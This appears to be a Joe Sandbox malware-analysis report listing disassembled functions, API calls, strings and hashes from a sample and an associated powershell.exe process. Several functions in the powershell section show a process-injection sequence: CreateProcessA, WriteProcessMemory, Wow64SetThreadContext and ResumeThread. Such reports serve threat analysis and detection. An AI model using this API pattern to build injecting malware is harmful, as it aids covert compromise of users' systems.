Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2634$#6195MessageSend
String ID:
API String ID: 2287514142-0
Opcode ID: a482fa3045dd67433e8c94a1db20820c4527a4d4c5918f66bb8c7d86c1e1a77f
Instruction ID: 79bcaa92a6f4a4f72567fb07d160f735297c0a12e258ebbcb5d9467f829e252d
Opcode Fuzzy Hash: a482fa3045dd67433e8c94a1db20820c4527a4d4c5918f66bb8c7d86c1e1a77f
Instruction Fuzzy Hash: FBE0823038032662FF3022207C0BFE92A228B80F10F120060B30C2E1C38FA268838AD4

Function 00201AC0 Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

#6205.MFC42U(?,00000001,00000001), ref: 00201AD1
#6205.MFC42U(?,00000001,00000001,?,00000001,00000001), ref: 00201AE1
#6211.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00201AE9
#2385.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00201AF1

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6205$#2385#6211
String ID:
API String ID: 1216781411-0
Opcode ID: 21d6c31132203677178dd29b82ffeeb1b5eb319e9fe48c86448bb1a5fec078e2
Instruction ID: 5bdf013e3d0b45d2b67d0842f3287ac5826acffb36b5c2c98c82af8347857c07
Opcode Fuzzy Hash: 21d6c31132203677178dd29b82ffeeb1b5eb319e9fe48c86448bb1a5fec078e2
Instruction Fuzzy Hash: 98E01DB571031877CF34EBF588D5CAFB69DFB483547410C19705AA71C3D9245D548B60

Function 0020B37C Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0020B383
#324.MFC42U(00000083,?,00000004,00202D50,?,85C979FC), ref: 0020B395
#540.MFC42U(00000083,?,00000004,00202D50,?,85C979FC), ref: 0020B3A7
#861.MFC42U(001F21A0,00000083,?,00000004,00202D50,?,85C979FC), ref: 0020B3B8

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #324#540#861H_prolog3
String ID:
API String ID: 2127517272-0
Opcode ID: 4d353fefb1024f4594175d196e1aa43d366938c9a9b947aa4e118b1a5862d47a
Instruction ID: 6452656ede0a30e58634424f6c4ea80ed10aa21910a6386f778cfe80f9f64408
Opcode Fuzzy Hash: 4d353fefb1024f4594175d196e1aa43d366938c9a9b947aa4e118b1a5862d47a
Instruction Fuzzy Hash: F9E01A7166034AABDB14FBA48902BAD7A65BFA5300F104058F700562C3DBB05660CB66

Function 002015C0 Relevance: 6.0, APIs: 4, Instructions: 17COMMON

Download Yara Rule

APIs

#736.MFC42U(?,0020161D), ref: 002015D7
#807.MFC42U(?,0020161D), ref: 002015E2
#796.MFC42U(?,0020161D), ref: 002015ED
#794.MFC42U(?,0020161D), ref: 002015F8

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #736#794#796#807
String ID:
API String ID: 2485769241-0
Opcode ID: 94e88b4c88bcbdc8b9de8082b6562dda5f269b363287ae5b0fdf217d75908208
Instruction ID: 692a9c4e44f7331fb4717190eaf642e4af129c7f89eef07100e76928230b8ee7
Opcode Fuzzy Hash: 94e88b4c88bcbdc8b9de8082b6562dda5f269b363287ae5b0fdf217d75908208
Instruction Fuzzy Hash: CBE046710213008BCB25EF20E855AEAB3A1BB50314B2249AD9067172A2EF702A94CF90

Function 001FC53F Relevance: 6.0, APIs: 4, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

#693.MFC42U(?,001FC5BD), ref: 001FC550
#609.MFC42U(?,001FC5BD), ref: 001FC55B
#609.MFC42U(?,001FC5BD), ref: 001FC566
#609.MFC42U(?,001FC5BD), ref: 001FC56E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #609$#693
String ID:
API String ID: 2192965535-0
Opcode ID: 9c692c2abb0ec6ce7a26a598d3b92633cbe8ed1ec902d351637d65980e6b9d62
Instruction ID: d6f15bc9cfe142bafef6cc5f291f80e225aa9ec30f33cd250bf073f0da5e394a
Opcode Fuzzy Hash: 9c692c2abb0ec6ce7a26a598d3b92633cbe8ed1ec902d351637d65980e6b9d62
Instruction Fuzzy Hash: 61D01771021B128BC738EB70D4529FAFBD2AF54340F22896EA5A7035D2AF702A54CF50

Function 6C4E3634 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 6C4E3659

Strings

MOC, xrefs: 6C4E366B
RCC, xrefs: 6C4E3673

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 35b545585543e06dee0b3cda9b4153d869778ab4d9da3695b05d20efa9a7ce51
Instruction ID: 113e96f596b3040d6ef85b7097ac4b4f5b03cfec92f16dc5dbaa14d213f5ecef
Opcode Fuzzy Hash: 35b545585543e06dee0b3cda9b4153d869778ab4d9da3695b05d20efa9a7ce51
Instruction Fuzzy Hash: FA416771900209AFCF16CFA5CD80EEE7BB5BF4830AF268199E914A7620D735A950CB90

Function 00203E89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

#540.MFC42U(85C979FC,?,?,00000000,00000000,002109C4,000000FF,?,00202016), ref: 00203ECE
#540.MFC42U(85C979FC,?,?,00000000,00000000,002109C4,000000FF,?,00202016), ref: 00203EE0

Strings

py , xrefs: 00203EC2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #540
String ID: py
API String ID: 747650028-1847808821
Opcode ID: 6d3755687e6e70c4be4ecbde2706157d2dfd1a9a7ae726ef497c2192bdc187f7
Instruction ID: 01a91e75acfe90cae3a632b6e83ec5dce3810311b582233030b9bfafacb3c6b5
Opcode Fuzzy Hash: 6d3755687e6e70c4be4ecbde2706157d2dfd1a9a7ae726ef497c2192bdc187f7
Instruction Fuzzy Hash: 6C21A672A10219DFDB00DF88C896BAFB7B5FF44324F104A59E021AF2D2C7B1A900CB44

Function 0020D473 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000028,?,?), ref: 0020D4A1
wsprintfW.USER32 ref: 0020D4B2

Strings

CLSID\%s\%s, xrefs: 0020D4AC

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: FromStringwsprintf
String ID: CLSID\%s\%s
API String ID: 1205525775-576494604
Opcode ID: dbfd9d6332fb4a82936d3f78ffa6eb1dbd249660f977f9dc4ca801e2bdad7d4f
Instruction ID: 1fdbbf2fb02f6605ea8982f0153753989d1324fe5669ee4fd3a4df92d64845ad
Opcode Fuzzy Hash: dbfd9d6332fb4a82936d3f78ffa6eb1dbd249660f977f9dc4ca801e2bdad7d4f
Instruction Fuzzy Hash: 01F0627260030CABCB00EF99DD058EF77FDEB86710B108025FD06AB140DA70AB09CB90

Function 002040E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00209137: CoFreeUnusedLibraries.OLE32(00204689,00000000,?), ref: 002091A2

#800.MFC42U(85C979FC,?,?,002109DF,000000FF), ref: 00204128
#800.MFC42U(85C979FC,?,?,002109DF,000000FF), ref: 00204133

Strings

py , xrefs: 00204111

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$FreeLibrariesUnused
String ID: py
API String ID: 2298315438-1847808821
Opcode ID: f869d680007e6fd4b34e23f96503657f0a5aa120c1e0d58361c27abb17549b60
Instruction ID: 1346b15b3b477a31b2260725835ec162325591432a021ae39d13b566f4e6d8ae
Opcode Fuzzy Hash: f869d680007e6fd4b34e23f96503657f0a5aa120c1e0d58361c27abb17549b60
Instruction Fuzzy Hash: D8F090B1A142499BCB08EF84DC91BAEB3B5FB48704F004529E022A77C2CB356810CB10

Function 6C4E869E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(6C4F6FE8), ref: 6C4E86BB

Strings

oOl, xrefs: 6C4E86AA
@pOl, xrefs: 6C4E86C7

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: FreeLibrary
String ID: @pOl$oOl
API String ID: 3664257935-484973383
Opcode ID: 41cfbbd9c8425dbf8225600e3f9eda34251a9065e8e1bba03b514f060e6a8ede
Instruction ID: 9b5800df93204a139b603681459983cc70a99f8a4112f8fb3ebbca3734b957dc
Opcode Fuzzy Hash: 41cfbbd9c8425dbf8225600e3f9eda34251a9065e8e1bba03b514f060e6a8ede
Instruction Fuzzy Hash: 46E026328102048BEF209E1CD400F80B6F44B6433BF27165BD4F811AE0827008D2C689

Function 00203CFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#543.MFC42U(00000000,?,00000000,?,00203E30), ref: 00203D0A
InitializeCriticalSection.KERNEL32(00000008,00000000,?,00000000,?,00203E30), ref: 00203D19

Strings

` , xrefs: 00203D12

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #543CriticalInitializeSection
String ID: `
API String ID: 3994007337-1963694126
Opcode ID: 0af76d500d701b06e2b464520410b013526f11705343232d6ca719b30619ffbd
Instruction ID: 76b3e151b3965db01b287fbf5321c0c7edfd8c81e63cd8b3d0d0849c2eb5d6ed
Opcode Fuzzy Hash: 0af76d500d701b06e2b464520410b013526f11705343232d6ca719b30619ffbd
Instruction Fuzzy Hash: C5D0A7B15003146BC7147B45DC0A9C77AECDB45710F010419F65693241EBF1ED0087D0

Function 00203F53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

#303.MFC42U(SysTreeView32,50800000,?,000000FF,?,00203D6D,85C979FC,?,00000000,00210996,000000FF,?,00202096), ref: 00203F69

Strings

SysTreeView32, xrefs: 00203F61
, xrefs: 00203F6E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #303
String ID: $SysTreeView32
API String ID: 3581465568-2488148541
Opcode ID: 7dbe0711d495078bb0b33462c0e2921ab3f844b86be3fab11695927f9e12d199
Instruction ID: 0f9efacc8459aae71b6df2f12f7114947e6b6c36bd2346a18459f12d02bb53a4
Opcode Fuzzy Hash: 7dbe0711d495078bb0b33462c0e2921ab3f844b86be3fab11695927f9e12d199
Instruction Fuzzy Hash: 61C012B161022877D7206B858D06D57795CDA80AA0F11015AB51057341F7F19D0087D8

Function 001FEE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

#4709.MFC42U ref: 001FEE75
#6195.MFC42U(System Configuration), ref: 001FEE81

Strings

System Configuration, xrefs: 001FEE7A

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #4709#6195
String ID: System Configuration
API String ID: 513596607-3459905039
Opcode ID: bd44cabca81c823ee79af3a97a503698da9efcac1aa9350ee37cd4c50e8b1bb9
Instruction ID: 424f8f3383cbdff8c2553536ac467633016ffbf14849ab78e4dbd0b6ce2b67f4
Opcode Fuzzy Hash: bd44cabca81c823ee79af3a97a503698da9efcac1aa9350ee37cd4c50e8b1bb9
Instruction Fuzzy Hash: 3BB09B226753B426DB783134340146D054559C162035708757411D3282DD54CF9207C0

Function 0020C5CA Relevance: 5.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0020C5E5
free.MSVCRT ref: 0020C5F5
free.MSVCRT ref: 0020C605
free.MSVCRT ref: 0020C615

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e9aafe2db383c23d535fc444e3724dc459f96549c466aa0102311a2ccd5983b2
Instruction ID: e3dec47c030d48324d54cf56061eb7f82c62f46c77c0bf706f9fe41b6abfddee
Opcode Fuzzy Hash: e9aafe2db383c23d535fc444e3724dc459f96549c466aa0102311a2ccd5983b2
Instruction Fuzzy Hash: 1CF0BD71420722DFD7392F24E80C7D6BBE1EB50722F269A2DE0A6504F2DB75A8D5CE00

Analysis Process: powershell.exePID: 7728, Parent PID: 7680COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	78
Total number of Limit Nodes:	7

Executed Functions

Function 06EE2760 Relevance: 13.0, Strings: 10, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06EE29BB
tP^q, xrefs: 06EE2BA9
(o^q, xrefs: 06EE2C25
84k, xrefs: 06EE2B57
tP^q, xrefs: 06EE2B9D
4'^q, xrefs: 06EE2806
4'^q, xrefs: 06EE2812
84k, xrefs: 06EE2B4D
(o^q, xrefs: 06EE2C35
4'^q, xrefs: 06EE29C7

Memory Dump Source

Source File: 00000006.00000002.1787373118.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ee0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$84k$84k$tP^q$tP^q
API String ID: 0-2464707135
Opcode ID: 6ea2e5fd566af3c5f031ce3d0d282d5998840c7b5ae0995d9295ee4317472831
Instruction ID: 93884d5bce67ccbe43595baeabac8b31fac0a2d253add1cbc7f41f95a0cce94c
Opcode Fuzzy Hash: 6ea2e5fd566af3c5f031ce3d0d282d5998840c7b5ae0995d9295ee4317472831
Instruction Fuzzy Hash: 99023931F043089FCB648F68D804BAABBAAFF85314F24D46AD6058F355DB32CA55C7A1

Function 042468D5 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04246B16

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1dae19877e04825f1325f6519255a04325775a899cf0c5bea6b43554b3a833c6
Instruction ID: 3bf0e583b7e754d1b635bc5792bbccf158cec62784f51a44d933636131d28efa
Opcode Fuzzy Hash: 1dae19877e04825f1325f6519255a04325775a899cf0c5bea6b43554b3a833c6
Instruction Fuzzy Hash: FDA17C71E1061A9FEF14CFA8C8407DDBBB2FF85314F048169E848A7290DB78A985CF91

Function 042468E0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04246B16

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cb3490baad7b0cc60e0aa557c899f6d0701d879871255059842afe6f67f58f39
Instruction ID: 015c75c67211708ed53ebfc507e14957d230193eb710e7fee5de56b898c556cd
Opcode Fuzzy Hash: cb3490baad7b0cc60e0aa557c899f6d0701d879871255059842afe6f67f58f39
Instruction Fuzzy Hash: E0914C71E1061A9FEF14CFA8C8407DDBBB2FF85314F148569D848A7250DB78A985CF91

Function 04246651 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 042466E8

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 19970646a8643f1954d5f6c1b844281dc2f02bbb7842093103b758d63a813b6b
Instruction ID: 6b05225bacebe2412dced9e0c1dde43d88e6187c642499e4d269c865f21aad12
Opcode Fuzzy Hash: 19970646a8643f1954d5f6c1b844281dc2f02bbb7842093103b758d63a813b6b
Instruction Fuzzy Hash: 992148B19003599FCB10DFA9C941BDEBFF5FF88324F108429E958A7250DB78A944CBA5

Function 04246658 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 042466E8

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0c4b08a0eeda8ad88c4a2cc77d68120fac9cd4df53c7bae85471e4249a0e4f00
Instruction ID: 8490b380e2e900b9c2c524cb9a338634f325892c355f148f9d29af8757d24253
Opcode Fuzzy Hash: 0c4b08a0eeda8ad88c4a2cc77d68120fac9cd4df53c7bae85471e4249a0e4f00
Instruction Fuzzy Hash: B3215AB19003599FCB10DFA9C940BDEBBF4FF48310F108429E918A7250D778A944CBA4

Function 042464B9 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0424653E

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0d9948a7c5e88c6227fd54300a6f8a41960a315599497eaa958c326de923d243
Instruction ID: ef3944b8f4fa02bf13b8adca5faf0fe950ce4e8adbefb5138c0145bd19825ec9
Opcode Fuzzy Hash: 0d9948a7c5e88c6227fd54300a6f8a41960a315599497eaa958c326de923d243
Instruction Fuzzy Hash: AF2138B19003098FDB14DFAAC4857EEBBF4EF88324F148429D459A7240DB78A985CFA5

Function 042464C0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0424653E

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: af54d8c2ac0e6a6fb7c9c14a42c2c51a684ff30fc363f133c5705251285a5236
Instruction ID: 15624a7646568d09270d04c58b5b023f346235fc0d0d4974179e0bdebc1e3566
Opcode Fuzzy Hash: af54d8c2ac0e6a6fb7c9c14a42c2c51a684ff30fc363f133c5705251285a5236
Instruction Fuzzy Hash: 1C2149B1D003098FDB14DFAAC4857EEBBF4EF88324F148429D459A7240DB78A984CFA5

Function 04246408 Relevance: 1.6, APIs: 1, Instructions: 53
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,D97C5C07), ref: 04246472

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2d85e4ec0b4903f4fdb4a7e55cb4bafaa5b799c1cd9e3400d1960b1ac50ee1f3
Instruction ID: e5b40987206d8a4be702cedf618f0e7cc29ceace33bb8b5ea15787547fdb2f56
Opcode Fuzzy Hash: 2d85e4ec0b4903f4fdb4a7e55cb4bafaa5b799c1cd9e3400d1960b1ac50ee1f3
Instruction Fuzzy Hash: 0F1158B59002498FDB24DFAAC4457EEFFF4EB88324F248429D459A7210CB38A944CFA5

Function 04246410 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,D97C5C07), ref: 04246472

Memory Dump Source

Source File: 00000006.00000002.1752530136.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4240000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fd702b6f7c467b38c3babaa814a1c3d137e1baf72780dbcf314d041ec8d77126
Instruction ID: ee5a889963c3cd7268de36cdabf6b0a347a8aade36aeb035ab168779ec141c6b
Opcode Fuzzy Hash: fd702b6f7c467b38c3babaa814a1c3d137e1baf72780dbcf314d041ec8d77126
Instruction Fuzzy Hash: 091136B19003498FDB24DFAAC4457EEFBF4EB89324F248429D459A7250CB78A944CFA5

Function 06EE2740 Relevance: 1.3, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06EE2806

Memory Dump Source

Source File: 00000006.00000002.1787373118.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ee0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 6d490721e5250469de84c7fb06ac6fb06281b58496dcd778599115a49566c37f
Instruction ID: f2fa745c96424876f09ea1d996330746cd840e04ed9712a251f53b17635c14c3
Opcode Fuzzy Hash: 6d490721e5250469de84c7fb06ac6fb06281b58496dcd778599115a49566c37f
Instruction Fuzzy Hash: D421F630E04345DFDBA4CF65C844AA67BF9BF45364B09D1ABD604CB152D734CA44CBA6

Function 040AD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1752008648.00000000040AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e73d20886a85dbc4e7bf5ca96e233ef09dc1f2b57e53c6031f008aaf605613e4
Instruction ID: b725e5e8b052677f87d8fc65ac01f48c55ef03fc6b3126f5338bdbd22a3baaa6
